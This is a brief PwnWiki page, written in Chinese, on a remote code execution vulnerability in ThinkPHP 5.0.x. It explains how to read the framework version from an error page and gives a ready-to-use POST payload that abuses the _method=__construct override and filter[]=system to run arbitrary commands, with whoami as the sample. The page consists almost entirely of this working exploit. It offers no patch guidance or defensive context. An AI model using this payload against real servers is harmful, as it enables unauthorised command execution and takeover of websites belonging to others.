ThinkPHP 5.0.13 代码执行漏洞

From PwnWiki

Revision as of 14:07, 3 July 2021 by Xc1ym (talk | contribs) (Created page with "post发送数据")

(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

Other languages:

Chinese • ‎中文（中国大陆）‎

影响版本

ThinkPHP <= v5.0.19

漏洞利用

通过报错确定ThinkPHP版本

http://127.0.0.1/tk5/public/index.php/111

Payload

http://127.0.0.1/tk5/public/index.php

post发送数据

s=whoami&_method=__construct&method=&filter[]=system

Retrieved from "https://pwnwiki.com/index.php?title=ThinkPHP_5.0.13_代碼執行漏洞/zh-cn&oldid=6226"